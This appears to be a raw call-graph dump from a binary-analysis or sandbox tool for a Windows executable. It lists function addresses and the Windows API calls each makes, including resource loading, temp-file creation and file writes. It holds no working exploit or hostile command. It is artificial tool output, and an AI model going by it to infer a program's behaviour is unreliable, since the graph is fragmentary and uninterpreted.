8195->8196 8197 401dab 8196->8197 8197->7570 8197->8154 8198->8164 8199->8168 8201 40e260 3 API calls 8200->8201 8202 405dcb 8201->8202 8202->7639 8203->7630 8204->7653 8206 40327b 8205->8206 8206->8206 8207 40dfc0 21 API calls 8206->8207 8208 40328d 8207->8208 8209 4051a0 3 API calls 8208->8209 8210 403296 8209->8210 9064 405060 8210->9064 8213 405060 2 API calls 8214 4032af 8213->8214 9067 402bc1 8214->9067 8217 4032b8 9077 40559a GetVersionExW 8217->9077 8218 4032cb 8221 4032d5 8218->8221 8222 40343b 8218->8222 9072 40de80 GetLastError TlsGetValue SetLastError 8221->9072 9110 40de80 GetLastError TlsGetValue SetLastError 8222->9110 8225 403441 9111 40de80 GetLastError TlsGetValue SetLastError 8225->9111 8226 4032db 9073 40de80 GetLastError TlsGetValue SetLastError 8226->9073 8229 403449 8231 4062c0 3 API calls 8229->8231 8230 4032e3 9074 4062c0 8230->9074 8233 403455 8231->8233 8235 40dec0 3 API calls 8233->8235 8237 40345f GetSystemDirectoryW PathAddBackslashW 8235->8237 8236 40dec0 3 API calls 8238 4032f9 GetWindowsDirectoryW PathAddBackslashW 8236->8238 8240 403439 8237->8240 9083 40de80 GetLastError TlsGetValue SetLastError 8238->9083 9112 40de80 GetLastError TlsGetValue SetLastError 8240->9112 8241 40331a 8243 40e020 4 API calls 8241->8243 8245 403322 8243->8245 8244 403480 8246 40e020 4 API calls 8244->8246 8247 40e020 4 API calls 8245->8247 8248 403488 8246->8248 8250 40332d 8247->8250 9113 405170 TlsGetValue 8248->9113 8252 40dec0 3 API calls 8250->8252 8251 40348f 8254 40df50 HeapFree 8251->8254 8253 403337 PathAddBackslashW 8252->8253 9084 40de80 GetLastError TlsGetValue SetLastError 8253->9084 8256 4034a7 8254->8256 8258 40df50 HeapFree 8256->8258 8257 40334a 8259 40e020 4 API calls 8257->8259 8260 4034af 8258->8260 8261 403352 8259->8261 8262 40df50 HeapFree 8260->8262 8263 40e020 4 API calls 8261->8263 8264 4034b8 8262->8264 8265 40335c 8263->8265 8266 40df50 HeapFree 8264->8266 8267 40dec0 3 API calls 8265->8267 8268 4034c1 8266->8268 8269 403366 8267->8269 8271 40df50 HeapFree 8268->8271 9085 40de80 GetLastError TlsGetValue SetLastError 8269->9085 8273 4034ca 8271->8273 8272 403370 8274 40e020 4 API calls 8272->8274 8273->7658 8275 403378 8274->8275 8276 40e020 4 API calls 8275->8276 8277 403382 8276->8277 8278 40e020 4 API calls 8277->8278 8279 40338c 8278->8279 8280 40dec0 3 API calls 8279->8280 8281 403396 8280->8281 9086 40adc0 8281->9086 8283 4033a4 8284 4033ba 8283->8284 9096 40a9d0 8283->9096 8286 40adc0 11 API calls 8284->8286 8287 4033d2 8286->8287 8288 4033e8 8287->8288 8289 40a9d0 11 API calls 8287->8289 8288->8240 9108 40de80 GetLastError TlsGetValue SetLastError 8288->9108 8289->8288 8291 403404 9109 40de80 GetLastError TlsGetValue SetLastError 8291->9109 8293 40340c 8294 4062c0 3 API calls 8293->8294 8295 403418 8294->8295 8296 40dec0 3 API calls 8295->8296 8297 403422 GetSystemDirectoryW PathAddBackslashW 8296->8297 8297->8240 8298->7664 8299->7666 8300->7668 8301->7670 8302->7674 8303->7680 8304->7682 8305->7684 8306->7686 8307->7690 8309 40dfc0 21 API calls 8308->8309 8310 402eaa 8309->8310 8311 405060 2 API calls 8310->8311 8312 402eb6 FindResourceW 8311->8312 8313 402ed5 8312->8313 8320 402ef1 8312->8320 9141 4026b8 8313->9141 8317 402f00 9155 40e7c0 8317->9155 9152 409ba0 8320->9152 8322 40df50 HeapFree 8323 402f3b 8322->8323 8324 40de80 GetLastError TlsGetValue SetLastError 8323->8324 8324->7698 8326 40dfc0 21 API calls 8325->8326 8327 4021b0 8326->8327 8328 4051a0 3 API calls 8327->8328 8329 4021b9 8328->8329 8330 4023ae 8329->8330 9181 40de80 GetLastError TlsGetValue SetLastError 8329->9181 9287 40de80 GetLastError TlsGetValue SetLastError 8330->9287 8333 4021d8 9182 40de80 GetLastError TlsGetValue SetLastError 8333->9182 8334 4023c4 8336 40e020 4 API calls 8334->8336 8338 4023cc 8336->8338 8337 4021e0 9183 40de80 GetLastError TlsGetValue SetLastError 8337->9183 9288 405170 TlsGetValue 8338->9288 8341 4023d3 8344 40df50 HeapFree 8341->8344 8342 4021e8 9184 40de80 GetLastError TlsGetValue SetLastError 8342->9184 8346 4023eb 8344->8346 8345 4021f0 9185 409c10 8345->9185 8348 40df50 HeapFree 8346->8348 8351 4023f4 8348->8351 8349 402204 9194 405182 TlsGetValue 8349->9194 8353 40df50 HeapFree 8351->8353 8352 402209 9195 406060 8352->9195 8355 4023fc 8353->8355 8357 40df50 HeapFree 8355->8357 8359 402405 8357->8359 8358 40dec0 3 API calls 8360 40221b 8358->8360 8359->7701 9198 40de80 GetLastError TlsGetValue SetLastError 8360->9198 8362 402221 9199 40de80 GetLastError TlsGetValue SetLastError 8362->9199 8364 402229 9200 40de80 GetLastError TlsGetValue SetLastError 8364->9200 8366 402231 9201 40de80 GetLastError TlsGetValue SetLastError 8366->9201 8368 402239 8369 409c10 5 API calls 8368->8369 8370 402250 8369->8370 9202 405182 TlsGetValue 8370->9202 8372 402255 8373 406060 5 API calls 8372->8373 8374 40225d 8373->8374 8375 40dec0 3 API calls 8374->8375 8376 402267 8375->8376 9203 40de80 GetLastError TlsGetValue SetLastError 8376->9203 8378 40226d 9204 40de80 GetLastError TlsGetValue SetLastError 8378->9204 8380 402275 9205 40de80 GetLastError TlsGetValue SetLastError 8380->9205 8382 402288 9206 40de80 GetLastError TlsGetValue SetLastError 8382->9206 8384 402290 9207 4057f0 8384->9207 8386 4022a6 9223 40e080 TlsGetValue 8386->9223 8388 4022ab 9224 40de80 GetLastError TlsGetValue SetLastError 8388->9224 8390 4022b1 9225 40de80 GetLastError TlsGetValue SetLastError 8390->9225 8392 4022b9 8393 4057f0 9 API calls 8392->8393 8394 4022cf 8393->8394 9226 405182 TlsGetValue 8394->9226 8396 4022d4 9227 405182 TlsGetValue 8396->9227 8398 4022dc 9228 408f69 8398->9228 8400 4022e5 8401 40dec0 3 API calls 8400->8401 8402 4022ef 8401->8402 8403 4023b0 8402->8403 8404 402300 8402->8404 8406 401fa9 36 API calls 8403->8406 9270 40de80 GetLastError TlsGetValue SetLastError 8404->9270 8406->8330 8407 402306 9271 40de80 GetLastError TlsGetValue SetLastError 8407->9271 8409 40230e 9272 40de80 GetLastError TlsGetValue SetLastError 8409->9272 8411 40231b 9273 40de80 GetLastError TlsGetValue SetLastError 8411->9273 8413 402323 8414 406060 5 API calls 8413->8414 8415 40232e 8414->8415 9274 405182 TlsGetValue 8415->9274 8417 402333 8418 40d100 8 API calls 8417->8418 8419 40233b 8418->8419 8420 40dec0 3 API calls 8419->8420 8421 402345 8420->8421 8421->8330 9275 40de80 GetLastError TlsGetValue SetLastError 8421->9275 8423 40235b 9276 40de80 GetLastError TlsGetValue SetLastError 8423->9276 8425 402368 9277 40de80 GetLastError TlsGetValue SetLastError 8425->9277 8427 402370 8428 4057f0 9 API calls 8427->8428 8429 402386 8428->8429 9278 40e080 TlsGetValue 8429->9278 8431 40238b 9279 405182 TlsGetValue 8431->9279 8433 402396 9280 408e27 8433->9280 8436 4051a0 3 API calls 8437 4023a4 8436->8437 8438 401fa9 36 API calls 8437->8438 8438->8330 8440 40dfc0 21 API calls 8439->8440 8444 401969 8440->8444 8441 4019ea 8443 409ba0 RtlAllocateHeap 8441->8443 8442 40de80 GetLastError TlsGetValue SetLastError 8442->8444 8445 4019f4 8443->8445 8444->8441 8444->8442 8448 405dc0 3 API calls 8444->8448 8457 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8444->8457 8460 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8444->8460 9339 40de80 GetLastError TlsGetValue SetLastError 8445->9339 8447 4019fe 9340 40de80 GetLastError TlsGetValue SetLastError 8447->9340 8448->8444 8450 401a06 9341 40a756 8450->9341 8453 40dec0 3 API calls 8454 401a17 GetTempFileNameW 8453->8454 9350 40de80 GetLastError TlsGetValue SetLastError 8454->9350 8456 401a35 9351 40de80 GetLastError TlsGetValue SetLastError 8456->9351 8457->8444 8459 401a3d 8461 409bc0 4 API calls 8459->8461 8460->8444 8462 401a48 8461->8462 8463 40dec0 3 API calls 8462->8463 8464 401a54 8463->8464 9352 40a7e7 8464->9352 8470 401a8a 9361 40de80 GetLastError TlsGetValue SetLastError 8470->9361 8472 401a92 8473 409bc0 4 API calls 8472->8473 8474 401a9d 8473->8474 8475 40dec0 3 API calls 8474->8475 8476 401aa9 8475->8476 8477 40a7e7 2 API calls 8476->8477 8478 401ab4 8477->8478 8479 40a6c5 3 API calls 8478->8479 8480 401abf GetTempFileNameW PathAddBackslashW 8479->8480 9362 40de80 GetLastError TlsGetValue SetLastError 8480->9362 8482 401aea 9363 40de80 GetLastError TlsGetValue SetLastError 8482->9363 8484 401af2 8485 409bc0 4 API calls 8484->8485 8486 401afd 8485->8486 8487 40dec0 3 API calls 8486->8487 8488 401b09 8487->8488 8489 40a7e7 2 API calls 8488->8489 8490 401b14 PathRenameExtensionW GetTempFileNameW 8489->8490 9364 40de80 GetLastError TlsGetValue SetLastError 8490->9364 8492 401b43 9365 40de80 GetLastError TlsGetValue SetLastError 8492->9365 8494 401b4b 8495 409bc0 4 API calls 8494->8495 8496 401b56 8495->8496 8497 40dec0 3 API calls 8496->8497 8498 401b62 8497->8498 9366 409b80 HeapFree 8498->9366 8500 401b6b 8501 40df50 HeapFree 8500->8501 8502 401b78 8501->8502 8503 40df50 HeapFree 8502->8503 8504 401b81 8503->8504 8505 40df50 HeapFree 8504->8505 8506 401b8a 8505->8506 8507 40460e 8506->8507 8508 40dfc0 21 API calls 8507->8508 8522 40461b 8508->8522 8509 40469c 9373 40de80 GetLastError TlsGetValue SetLastError 8509->9373 8510 40de80 GetLastError TlsGetValue SetLastError 8510->8522 8512 4046a2 8514 40358d 98 API calls 8512->8514 8513 405dc0 3 API calls 8513->8522 8515 4046b8 8514->8515 8517 40dec0 3 API calls 8515->8517 8516 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8516->8522 8518 4046c2 8517->8518 9374 40a95a 8518->9374 8521 40df50 HeapFree 8523 4046d6 8521->8523 8522->8509 8522->8510 8522->8513 8522->8516 8524 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8522->8524 8525 40df50 HeapFree 8523->8525 8524->8522 8526 4046df 8525->8526 8527 40df50 HeapFree 8526->8527 8528 4043c2 8527->8528 8529 40de80 GetLastError TlsGetValue SetLastError 8528->8529 8529->7708 8531 40dfc0 21 API calls 8530->8531 8532 403597 8531->8532 8533 4051a0 3 API calls 8532->8533 8534 4035a0 8533->8534 8535 405060 2 API calls 8534->8535 8536 4035ac 8535->8536 8537 4035b7 8536->8537 8538 4035db 8536->8538 9379 40de80 GetLastError TlsGetValue SetLastError 8537->9379 8539 4035e5 8538->8539 8540 403608 8538->8540 9381 40de80 GetLastError TlsGetValue SetLastError 8539->9381 8543 403612 8540->8543 8544 40363b 8540->8544 9382 40de80 GetLastError TlsGetValue SetLastError 8543->9382 8547 403645 8544->8547 8548 40366e 8544->8548 8545 4035bd 9380 40de80 GetLastError TlsGetValue SetLastError 8545->9380 8546 4035f1 8555 40e020 4 API calls 8546->8555 9400 40de80 GetLastError TlsGetValue SetLastError 8547->9400 8553 4036a1 8548->8553 8554 403678 8548->8554 8551 403618 9383 40de80 GetLastError TlsGetValue SetLastError 8551->9383 8552 4035c5 8558 40a7f5 5 API calls 8552->8558 8562 4036d4 8553->8562 8563 4036ab 8553->8563 9402 40de80 GetLastError TlsGetValue SetLastError 8554->9402 8560 4035f9 8555->8560 8565 4035cc 8558->8565 8569 40dec0 3 API calls 8560->8569 8561 40364b 9401 40de80 GetLastError TlsGetValue SetLastError 8561->9401 8567 403707 8562->8567 8568 4036de 8562->8568 9404 40de80 GetLastError TlsGetValue SetLastError 8563->9404 8564 403620 9384 40a83a 8564->9384 8575 40dec0 3 API calls 8565->8575 8566 40367e 9403 40de80 GetLastError TlsGetValue SetLastError 8566->9403 8572 403711 8567->8572 8573 40373a 8567->8573 9406 40de80 GetLastError TlsGetValue SetLastError 8568->9406 8578 4035d6 8569->8578 9408 40de80 GetLastError TlsGetValue SetLastError 8572->9408 8585 403744 8573->8585 8586 40376d 8573->8586 8575->8578 9377 40de80 GetLastError TlsGetValue SetLastError 8578->9377 8579 403653 8587 40a83a 17 API calls 8579->8587 8580 4036b1 9405 40de80 GetLastError TlsGetValue SetLastError 8580->9405 8583 403686 8594 40a83a 17 API calls 8583->8594 8584 4036e4 9407 40de80 GetLastError TlsGetValue SetLastError 8584->9407 9410 40de80 GetLastError TlsGetValue SetLastError 8585->9410 8591 403777 8586->8591 8592 40379d 8586->8592 8598 40365f 8587->8598 8589 4036b9 8599 40a83a 17 API calls 8589->8599 8590 403717 9409 40de80 GetLastError TlsGetValue SetLastError 8590->9409 9412 40de80 GetLastError TlsGetValue SetLastError 8591->9412 8606 4037f5 8592->8606 8607 4037a7 8592->8607 8593 40dec0 3 API calls 8593->8578 8602 403692 8594->8602 8608 40dec0 3 API calls 8598->8608 8610 4036c5 8599->8610 8613 40dec0 3 API calls 8602->8613 8603 40381f 8614 40e020 4 API calls 8603->8614 8604 4036ec 8615 40a83a 17 API calls 8604->8615 8605 40374a 9411 40de80 GetLastError TlsGetValue SetLastError 8605->9411 9442 40de80 GetLastError TlsGetValue SetLastError 8606->9442 9414 40de80 GetLastError TlsGetValue SetLastError 8607->9414 8608->8578 8620 40dec0 3 API calls 8610->8620 8611 40371f 8621 40a83a 17 API calls 8611->8621 8612 40377d 9413 40de80 GetLastError TlsGetValue SetLastError 8612->9413 8613->8578 8623 403827 8614->8623 8624 4036f8 8615->8624 8618 4037ad 9415 40de80 GetLastError TlsGetValue SetLastError 8618->9415 8619 4037fb 9443 40de80 GetLastError TlsGetValue SetLastError 8619->9443 8620->8578 8628 40372b 8621->8628 9378 405170 TlsGetValue 8623->9378 8631 40dec0 3 API calls 8624->8631 8625 403752 8632 40a83a 17 API calls 8625->8632 8636 40dec0 3 API calls 8628->8636 8629 403785 8637 40a83a 17 API calls 8629->8637 8631->8578 8633 40375e 8632->8633 8639 40dec0 3 API calls 8633->8639 8634 4037b5 9416 409355 8634->9416 8635 403803 8641 40a7f5 5 API calls 8635->8641 8636->8578 8642 403791 8637->8642 8638 40382e 8643 40df50 HeapFree 8638->8643 8639->8578 8645 40380a 8641->8645 8646 40dec0 3 API calls 8642->8646 8647 403846 8643->8647 8649 40dec0 3 API calls 8645->8649 8646->8578 8650 40df50 HeapFree 8647->8650 8648 40dec0 3 API calls 8651 4037d0 8648->8651 8649->8578 8652 40384e 8650->8652 8653 4037e9 8651->8653 8654 4037dd 8651->8654 8652->7711 8656 401fa9 36 API calls 8653->8656 9439 405532 8654->9439 8657 4037e7 8656->8657 8657->8578 8658->7715 8659->7717 8661 40dfc0 21 API calls 8660->8661 8662 402c04 8661->8662 8663 4051a0 3 API calls 8662->8663 8664 402c0d 8663->8664 8665 405060 2 API calls 8664->8665 8666 402c19 8665->8666 8667 409ba0 RtlAllocateHeap 8666->8667 8668 402c23 GetShortPathNameW 8667->8668 9452 40de80 GetLastError TlsGetValue SetLastError 8668->9452 8670 402c3f 9453 40de80 GetLastError TlsGetValue SetLastError 8670->9453 8672 402c47 8673 409c10 5 API calls 8672->8673 8674 402c57 8673->8674 8675 40dec0 3 API calls 8674->8675 8676 402c61 8675->8676 9454 409b80 HeapFree 8676->9454 8678 402c6a 9455 40de80 GetLastError TlsGetValue SetLastError 8678->9455 8680 402c74 8681 40e020 4 API calls 8680->8681 8682 402c7c 8681->8682 9456 405170 TlsGetValue 8682->9456 8684 402c83 8685 40df50 HeapFree 8684->8685 8686 402c9a 8685->8686 8687 40df50 HeapFree 8686->8687 8688 402ca3 8687->8688 8689 40e080 TlsGetValue 8688->8689 8689->7721 8690->7723 8692 4098c7 SetEnvironmentVariableW 8691->8692 8693 404434 8691->8693 8692->8693 8693->7726 8695->7729 8696->7737 8698 40dfc0 21 API calls 8697->8698 8699 401e5f 8698->8699 8700 4051a0 3 API calls 8699->8700 8701 401e68 8700->8701 9457 40de80 GetLastError TlsGetValue SetLastError 8701->9457 8703 401e6e 9458 40de80 GetLastError TlsGetValue SetLastError 8703->9458 8705 401e76 8706 409698 7 API calls 8705->8706 8707 401e7d 8706->8707 8708 40dec0 3 API calls 8707->8708 8709 401e87 PathQuoteSpacesW 8708->8709 8710 401ee0 8709->8710 8711 401e97 8709->8711 9525 40de80 GetLastError TlsGetValue SetLastError 8710->9525 9459 40de80 GetLastError TlsGetValue SetLastError 8711->9459 8714 401e9d 9460 4024f1 8714->9460 8715 401ee9 8717 40e020 4 API calls 8715->8717 8719 401ef1 8717->8719 8721 40dec0 3 API calls 8719->8721 8720 40dec0 3 API calls 8722 401eae 8720->8722 8723 401ede 8721->8723 9524 40de80 GetLastError TlsGetValue SetLastError 8722->9524 9526 40de80 GetLastError TlsGetValue SetLastError 8723->9526 8726 401eb7 8728 40e020 4 API calls 8726->8728 8727 401f05 8729 40e020 4 API calls 8727->8729 8730 401ebf 8728->8730 8731 401f0d 8729->8731 8732 40e020 4 API calls 8730->8732 9527 405170 TlsGetValue 8731->9527 8734 401eca 8732->8734 8736 40e020 4 API calls 8734->8736 8735 401f14 8738 40df50 HeapFree 8735->8738 8737 401ed4 8736->8737 8739 40dec0 3 API calls 8737->8739 8740 401f2b 8738->8740 8739->8723 8741 40df50 HeapFree 8740->8741 8742 401f34 8741->8742 8742->7740 8744 40385b 8743->8744 8744->8744 8745 40dfc0 21 API calls 8744->8745 8763 40386d 8745->8763 8746 4038ee 9558 40de80 GetLastError TlsGetValue SetLastError 8746->9558 8748 4038f4 9559 40de80 GetLastError TlsGetValue SetLastError 8748->9559 8750 4038fc 9560 40de80 GetLastError TlsGetValue SetLastError 8750->9560 8751 405dc0 3 API calls 8751->8763 8753 403904 9561 40de80 GetLastError TlsGetValue SetLastError 8753->9561 8755 40390c 8757 40d100 8 API calls 8755->8757 8756 40de80 GetLastError TlsGetValue SetLastError 8756->8763 8758 40391e 8757->8758 9562 405182 TlsGetValue 8758->9562 8759 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8759->8763 8761 403923 8762 405eb0 6 API calls 8761->8762 8764 40392b 8762->8764 8763->8746 8763->8751 8763->8756 8763->8759 8765 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8763->8765 8766 40dec0 3 API calls 8764->8766 8765->8763 8767 403935 8766->8767 9563 40de80 GetLastError TlsGetValue SetLastError 8767->9563 8769 40393b 9564 40de80 GetLastError TlsGetValue SetLastError 8769->9564 8771 403943 9565 40de80 GetLastError TlsGetValue SetLastError 8771->9565 8773 40394b 9566 40de80 GetLastError TlsGetValue SetLastError 8773->9566 8775 403953 8776 40d100 8 API calls 8775->8776 8777 403965 8776->8777 9567 405182 TlsGetValue 8777->9567 8779 40396a 8780 405eb0 6 API calls 8779->8780 8781 403972 8780->8781 8782 40dec0 3 API calls 8781->8782 8783 40397c 8782->8783 9568 40de80 GetLastError TlsGetValue SetLastError 8783->9568 8785 403982 9569 40de80 GetLastError TlsGetValue SetLastError 8785->9569 8787 40398a 9570 40de80 GetLastError TlsGetValue SetLastError 8787->9570 8789 403992 9571 40de80 GetLastError TlsGetValue SetLastError 8789->9571 8791 40399a 8792 40d100 8 API calls 8791->8792 8793 4039aa 8792->8793 9572 405182 TlsGetValue 8793->9572 8795 4039af 8796 405eb0 6 API calls 8795->8796 8797 4039b7 8796->8797 8798 40dec0 3 API calls 8797->8798 8799 4039c1 8798->8799 9573 40de80 GetLastError TlsGetValue SetLastError 8799->9573 8801 4039c7 9574 40de80 GetLastError TlsGetValue SetLastError 8801->9574 8803 4039cf 9575 40de80 GetLastError TlsGetValue SetLastError 8803->9575 8805 4039d7 9576 40de80 GetLastError TlsGetValue SetLastError 8805->9576 8807 4039df 8808 40d100 8 API calls 8807->8808 8809 4039ef 8808->8809 9577 405182 TlsGetValue 8809->9577 8811 4039f4 8812 405eb0 6 API calls 8811->8812 8813 4039fc 8812->8813 8814 40dec0 3 API calls 8813->8814 8815 403a06 8814->8815 9578 40de80 GetLastError TlsGetValue SetLastError 8815->9578 8817 403a0c 9579 40de80 GetLastError TlsGetValue SetLastError 8817->9579 8819 403a14 9580 40de80 GetLastError TlsGetValue SetLastError 8819->9580 8821 403a1c 9581 40de80 GetLastError TlsGetValue SetLastError 8821->9581 8823 403a24 8824 40d100 8 API calls 8823->8824 8825 403a34 8824->8825 9582 405182 TlsGetValue 8825->9582 8827 403a39 8828 405eb0 6 API calls 8827->8828 8829 403a41 8828->8829 8830 40dec0 3 API calls 8829->8830 8831 403a4b 8830->8831 9583 40de80 GetLastError TlsGetValue SetLastError 8831->9583 8833 403a51 9584 403cd7 8833->9584 8836 4051a0 3 API calls 8837 403a66 8836->8837 9625 40de80 GetLastError TlsGetValue SetLastError 8837->9625 8839 403a6c 8840 403cd7 84 API calls 8839->8840 8841 403a7c 8840->8841 8842 40dec0 3 API calls 8841->8842 8843 403a88 8842->8843 9626 40de80 GetLastError TlsGetValue SetLastError 8843->9626 8845 403a8e 8846 403cd7 84 API calls 8845->8846 8847 403a9e 8846->8847 8848 40dec0 3 API calls 8847->8848 8849 403aa8 8848->8849 9627 40de80 GetLastError TlsGetValue SetLastError 8849->9627 8851 403aae 8852 403cd7 84 API calls 8851->8852 8853 403abe 8852->8853 8854 40dec0 3 API calls 8853->8854 8855 403ac8 8854->8855 9628 40de80 GetLastError TlsGetValue SetLastError 8855->9628 8857 403ace 8858 403cd7 84 API calls 8857->8858 8859 403ade 8858->8859 8860 40dec0 3 API calls 8859->8860 8861 403ae8 8860->8861 9629 40de80 GetLastError TlsGetValue SetLastError 8861->9629 8863 403aee 9630 40de80 GetLastError TlsGetValue SetLastError 8863->9630 8865 403af6 9631 40de80 GetLastError TlsGetValue SetLastError 8865->9631 8867 403afe 8868 402bfa 43 API calls 8867->8868 8869 403b0b 8868->8869 9632 40e080 TlsGetValue 8869->9632 8871 403b10 9633 405182 TlsGetValue 8871->9633 8873 403b1f 9634 406650 8873->9634 8876 40dec0 3 API calls 8877 403b32 8876->8877 9637 40de80 GetLastError TlsGetValue SetLastError 8877->9637 8879 403b38 9638 40de80 GetLastError TlsGetValue SetLastError 8879->9638 8881 403b40 9639 40de80 GetLastError TlsGetValue SetLastError 8881->9639 8883 403b48 8884 402bfa 43 API calls 8883->8884 8885 403b55 8884->8885 9640 40e080 TlsGetValue 8885->9640 8887 403b5a 9641 405182 TlsGetValue 8887->9641 8889 403b69 8890 406650 13 API calls 8889->8890 8891 403b72 8890->8891 8892 40dec0 3 API calls 8891->8892 8893 403b7c 8892->8893 9642 40de80 GetLastError TlsGetValue SetLastError 8893->9642 8895 403b82 9643 40de80 GetLastError TlsGetValue SetLastError 8895->9643 8897 403b8e 8898 40e020 4 API calls 8897->8898 8899 403b96 8898->8899 8900 40e020 4 API calls 8899->8900 8901 403ba1 8900->8901 8902 40e020 4 API calls 8901->8902 8903 403bab 8902->8903 8904 40e020 4 API calls 8903->8904 8905 403bb5 8904->8905 8906 40e020 4 API calls 8905->8906 8907 403bbf 8906->8907 9644 40e080 TlsGetValue 8907->9644 8909 403bc4 9645 405182 TlsGetValue 8909->9645 8911 403bcf 9646 40240c 8911->9646 8914 4051a0 3 API calls 8915 403bdd 8914->8915 8916 40df50 HeapFree 8915->8916 8917 403be8 8916->8917 8918 40df50 HeapFree 8917->8918 8919 403bf1 8918->8919 8920 40df50 HeapFree 8919->8920 8921 403bfa 8920->8921 8922 40df50 HeapFree 8921->8922 8923 403c03 8922->8923 8924 40df50 HeapFree 8923->8924 8925 403c0c 8924->8925 8926 40df50 HeapFree 8925->8926 8927 403c15 8926->8927 8928 40df50 HeapFree 8927->8928 8929 403c1e 8928->8929 8930 40df50 HeapFree 8929->8930 8931 403c27 8930->8931 8932 40df50 HeapFree 8931->8932 8933 403c30 8932->8933 8934 40df50 HeapFree 8933->8934 8935 403c39 8934->8935 8936 40de80 GetLastError TlsGetValue SetLastError 8935->8936 8936->7745 8937->7751 8938->7767 8975 4054b7 EnterCriticalSection 8974->8975 8976 404502 8974->8976 8979 4054cd 8975->8979 8983 4054fd 8975->8983 8976->7765 8977 40db72 HeapAlloc 8981 405517 LeaveCriticalSection 8977->8981 8978 4054ce WaitForSingleObject 8978->8979 8980 4054de CloseHandle 8978->8980 8979->8978 8979->8983 8982 40db32 HeapFree 8980->8982 8981->8976 8982->8979 8983->8977 8985 40dfc0 21 API calls 8984->8985 8986 402cb7 8985->8986 8987 405060 2 API calls 8986->8987 8988 402cc3 8987->8988 8989 402cf0 8988->8989 9856 40de80 GetLastError TlsGetValue SetLastError 8988->9856 9114 40e0e0 9064->9114 9068 402bc7 9067->9068 9068->9068 9069 40dfc0 21 API calls 9068->9069 9070 402bd9 GetNativeSystemInfo 9069->9070 9071 402bec 9070->9071 9071->8217 9071->8218 9072->8226 9073->8230 9075 40e260 3 API calls 9074->9075 9076 4032ef 9075->9076 9076->8236 9078 4055c8 9077->9078 9082 4032bd 9077->9082 9078->9082 9120 405553 memset GetModuleHandleW 9078->9120 9081 405606 GetVersionExW 9081->9082 9082->8218 9083->8241 9084->8257 9085->8272 9087 40d498 5 API calls 9086->9087 9088 40add5 9087->9088 9089 40ae6e 9088->9089 9090 40addf CreateFileW 9088->9090 9089->8283 9091 40ae00 9090->9091 9092 40ae20 9090->9092 9091->9092 9094 40ae0d HeapAlloc 9091->9094 9093 40d40a 4 API calls 9092->9093 9095 40ae65 9092->9095 9093->9095 9094->9092 9095->8283 9097 40a9e9 9096->9097 9098 40a9da 9096->9098 9123 40d459 EnterCriticalSection 9097->9123 9127 40d9f5 9098->9127 9103 40aa2d 9103->8284 9104 40aa19 CloseHandle 9106 40d40a 4 API calls 9104->9106 9106->9103 9107 40aa08 HeapFree 9107->9104 9108->8291 9109->8293 9110->8225 9111->8229 9112->8244 9113->8251 9115 4032a2 9114->9115 9116 40e0ea wcslen HeapAlloc 9114->9116 9115->8213 9118 40e3a0 9116->9118 9119 40e3b0 9118->9119 9119->9115 9121 40558b 9120->9121 9122 40557b GetProcAddress 9120->9122 9121->9081 9121->9082 9122->9121 9124 40d472 9123->9124 9125 40d47d LeaveCriticalSection 9123->9125 9124->9125 9126 40a9f6 9125->9126 9126->9103 9126->9104 9133 40aa40 9126->9133 9128 40da02 9127->9128 9129 40a9e5 9127->9129 9136 40db1b EnterCriticalSection 9128->9136 9129->8284 9132 40da08 9132->9129 9137 40dac4 9132->9137 9134 40aa54 WriteFile 9133->9134 9135 40aa7c 9133->9135 9134->9107 9135->9107 9136->9132 9138 40dad0 9137->9138 9139 40db14 9138->9139 9140 40db0a LeaveCriticalSection 9138->9140 9139->9132 9140->9139 9142 40dfc0 21 API calls 9141->9142 9143 4026c1 LoadResource SizeofResource 9142->9143 9144 409ba0 RtlAllocateHeap 9143->9144 9145 4026ee 9144->9145 9158 409c80 memcpy 9145->9158 9147 402705 FreeResource 9148 402715 9147->9148 9149 4046ef 9148->9149 9159 409b60 9149->9159 9151 4046f8 9151->8320 9153 409ba8 RtlAllocateHeap 9152->9153 9154 409bba 9152->9154 9153->8317 9154->8317 9162 40e7e0 9155->9162 9157 402f24 9157->8322 9158->9147 9160 409b68 HeapSize 9159->9160 9161 409b7a 9159->9161 9160->9151 9161->9151 9163 40e7f8 __fprintf_l 9162->9163 9165 40e8aa __fprintf_l 9163->9165 9166 40e950 9163->9166 9165->9157 9167 40f3b2 9166->9167 9171 40e960 __fprintf_l 9166->9171 9167->9163 9168 40ef37 9172 40efa4 __fprintf_l 9168->9172 9173 4104f0 9168->9173 9170 40ee4f memcpy 9170->9171 9171->9167 9171->9168 9171->9170 9172->9163 9174 410504 9173->9174 9175 410572 memcpy 9174->9175 9176 41054c memcpy 9174->9176 9178 41051f 9174->9178 9179 410599 memcpy 9175->9179 9180 4105b8 9175->9180 9176->9172 9178->9172 9179->9172 9180->9172 9181->8333 9182->8337 9183->8342 9184->8345 9186 409c29 9185->9186 9187 409c19 9185->9187 9188 40e260 3 API calls 9186->9188 9289 409bc0 9187->9289 9191 409c3f 9188->9191 9190 409c26 9190->8349 9295 40e3f0 TlsGetValue 9191->9295 9193 409c68 9193->8349 9194->8352 9296 405f90 9195->9296 9197 402211 9197->8358 9198->8362 9199->8364 9200->8366 9201->8368 9202->8372 9203->8378 9204->8380 9205->8382 9206->8384 9208 40590f 9207->9208 9215 405801 9207->9215 9306 40e340 TlsGetValue 9208->9306 9210 405918 9210->8386 9211 405886 9213 40e1e0 TlsGetValue 9211->9213 9212 405850 wcsncmp 9212->9215 9214 4058c7 9213->9214 9216 4058e9 9214->9216 9305 40e230 TlsGetValue 9214->9305 9215->9211 9215->9212 9217 40e260 3 API calls 9216->9217 9220 4058f0 9217->9220 9219 4058d7 memmove 9219->9216 9221 405901 9220->9221 9222 4058f6 wcsncpy 9220->9222 9221->8386 9222->9221 9223->8388 9224->8390 9225->8392 9226->8396 9227->8398 9307 408e58 9228->9307 9230 408f81 9231 408e58 3 API calls 9230->9231 9232 408f90 9231->9232 9233 408e58 3 API calls 9232->9233 9234 408fa3 9233->9234 9235 408fb0 GetStockObject 9234->9235 9236 408fbd LoadIconW LoadCursorW RegisterClassExW 9234->9236 9235->9236 9311 4094d1 GetForegroundWindow 9236->9311 9241 409047 IsWindowEnabled 9242 40906b 9241->9242 9243 409052 EnableWindow 9241->9243 9244 4094d1 3 API calls 9242->9244 9243->9242 9245 40907e GetSystemMetrics 